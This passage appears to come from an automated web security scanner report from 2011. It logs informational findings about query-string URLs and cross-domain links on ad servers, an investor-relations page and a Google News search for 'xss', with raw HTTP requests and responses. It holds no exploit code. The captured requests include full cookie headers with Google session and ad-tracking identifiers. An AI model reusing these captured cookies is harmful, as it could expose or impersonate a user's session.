Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10296

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26adU%3DComputer.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26adU%3Dwww.NokiaUSA.com/Astound%26adT%3DNokia%2BAstound%2Bon%2BT-Mobile%26adU%3DBlackBerry.com/Pearl%26adT%3DBlackBerry%25C2%25AE%2BPearl%25E2%2584%25A2%2B8220%26gl%3DUS&usg=AFQjCNF-5XU8Fnbt_S9qbaSHOUxsm1BwVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

18.10. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2685156739&w=728&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156423&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305161156578&frm=0&adk=3420841610&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=1&dtd=265&xpc=HEBJlUc6zt&p=http%3A//www.dslreports.com

The response contains the following links to other domains:

http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TcstxgAMWx0K7GS0gKhpdUhyjVXN6p1up4lDYQ&r=1793774979&rand=48992&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.157,_imp.optdr.0&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI
http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.48992&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2685156739&w=728&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156423&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305161156578&frm=0&adk=3420841610&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=1&dtd=265&xpc=HEBJlUc6zt&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3137

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.48992&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement">
...[SNIP]...
</IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TcstxgAMWx0K7GS0gKhpdUhyjVXN6p1up4lDYQ&r=1793774979&rand=48992&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.157,_imp.optdr.0&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.11. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:59 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4635
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12688/127209/SP_IPv6_640x480_timer.jpg" width="640" height="480" border="0" alt="">
...[SNIP]...

18.12. http://investor.hickorytech.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.hickorytech.com
Path:	/phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

http://investor.hickorytech.com/phoenix.zhtml?c=79055&p=irol-irhome

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://media.corporate-ir.net/media_files/IROL/79/79055/2010cover_104.png
http://media.corporate-ir.net/media_files/IROL/79/79055/Apr2011InvestorUpdate.png
http://media.corporate-ir.net/media_files/IROL/global_images/arrow_downRed.gif
http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif
http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_print_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif
http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js
http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif
http://media.corporate-ir.net/media_files/priv/ccbn/webcast/microphone2.gif
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODg4MjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTE3MTN8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://www.enventis.com/
http://www.hickorytech-is.com/

Request

GET /phoenix.zhtml?c=79055&p=irol-irhome HTTP/1.1
Host: investor.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.9.10.1305158342

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 24164
Cache-Control: private, max-age=58
Date: Thu, 12 May 2011 00:02:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD41LzExLzIwMTEgODowMjowMSBQTTwvdGltZV
...[SNIP]...
</title><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<body><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</a> | <a href="http://www.enventis.com/">Enventis</a> | <a href="http://www.hickorytech-is.com/">Information Solutions</a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<a href="phoenix.zhtml?p=irol-eventDetails&c=79055&eventID=3960325" target="_self" ><img border="0" src="http://media.corporate-ir.net/media_files/priv/ccbn/webcast/microphone2.gif" alt="Webcast Image"/></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="4" /></td>
...[SNIP]...
<td nowrap="nowrap"> <img src="http://media.corporate-ir.net/media_files/IROL/global_images/arrow_downRed.gif" alt="Stock is Down" width="9" height="9" hspace="2" /> <span class="ccbnNeg">
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTE3MTN8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/2010cover_104.png" target="_blank" border="0" /></a>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODg4MjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/Apr2011InvestorUpdate.png" target="_blank" border="0" /></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<span class="ccbnDisclaimer"><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" border="0" height="27" width="125" /><br/>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="phoenix.zhtml?c=79055&p=irol-irhome_pf"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_print_t.gif" alt="Print Page" border="0" align="middle" /></a>
...[SNIP]...
ludmVzdG9yLmhpY2tvcnl0ZWNoLmNvbS9waG9lbml4LnpodG1sP2M9NzkwNTUmcD1pcm9sLWlyaG9tZQ%3d%3d" onclick="window.open(this.href,'','scrollbars=no,status=no,width=450,height=500');return false;" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif" alt="E-mail Page" border="0" align="middle" /></a>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=rssSubscription&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif" border="0" alt="RSS Feeds" align="middle" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-alerts&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif" border="0" alt="E-mail Alerts" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-contact&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif" border="0" alt="IR Contacts" align="middle" /></A>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="Tearsheet.ashx?c=79055"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif" border="0" alt="Financial Tear Sheet" align="middle" /></a>
...[SNIP]...

18.13. http://news.google.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/search

Issue detail

The page was loaded from a URL containing a query string:

http://news.google.com/news/search?q=xss&hl=en&biw=925&bih=964&bav=on.2,or.r_gc.r_pw.&um=1&cf=i&sa=X&ei=FzrLTcjXN4P40gHo6qDoCA&ved=0CAoQpwUoAQ

The response contains the following links to other domains:

http://googlenewsblog.blogspot.com/
http://nt0.ggpht.com/news/tbn/ANo1n5tGttMYUM/1.jpg
http://nt0.ggpht.com/news/tbn/lBoaMOipaLcOtM/1.jpg
http://nt1.ggpht.com/news/tbn/NccJbJ641jl0qM/1.jpg
http://nt1.ggpht.com/news/tbn/PQ-bGjxtzs5UNM/1.jpg
http://nt1.ggpht.com/news/tbn/aZJ7aWyfVQEr5M/1.jpg
http://nt1.ggpht.com/news/tbn/kUf4A8oelEE3mM/1.jpg
http://nt2.ggpht.com/news/tbn/1jXqVRtQK7EMAM/1.jpg
http://nt2.ggpht.com/news/tbn/HhlA3vFz1ZB6pM/1.jpg
http://nt3.ggpht.com/news/tbn/F5FjO7F-cP61qM/1.jpg
http://nt3.ggpht.com/news/tbn/t5y84RQOceJuEM/1.jpg
http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/
http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml
http://www.gstatic.com/news/img/cleardot.gif
http://www.gstatic.com/news/img/favicon.ico
http://www.gstatic.com/news/img/logo/en_us/news.gif
http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html
http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&pagtype=allchandate
http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html
http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali
http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter
http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---
http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google
http://www.youtube.com/results?q=xss&hl=en&tab=n1
http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html

Request

GET /news/search?q=xss&hl=en&biw=925&bih=964&bav=on.2,or.r_gc.r_pw.&um=1&cf=i&sa=X&ei=FzrLTcjXN4P40gHo6qDoCA&ved=0CAoQpwUoAQ HTTP/1.1
Host: news.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=scanmedios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 01:38:59 GMT
Expires: Thu, 12 May 2011 01:38:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 76999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=i&ned=us&hl=en&q=xss&cf=i&output=rss">
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=xss&hl=en&tab=n1">YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&pagtype=allchandate" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/lBoaMOipaLcOtM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article"><img alt="" src="http://nt2.ggpht.com/news/tbn/HhlA3vFz1ZB6pM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article"><img alt="" src="http://nt2.ggpht.com/news/tbn/1jXqVRtQK7EMAM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article"><img alt="" src="http://nt3.ggpht.com/news/tbn/F5FjO7F-cP61qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/aZJ7aWyfVQEr5M/1.jpg"></a>
...[SNIP]...
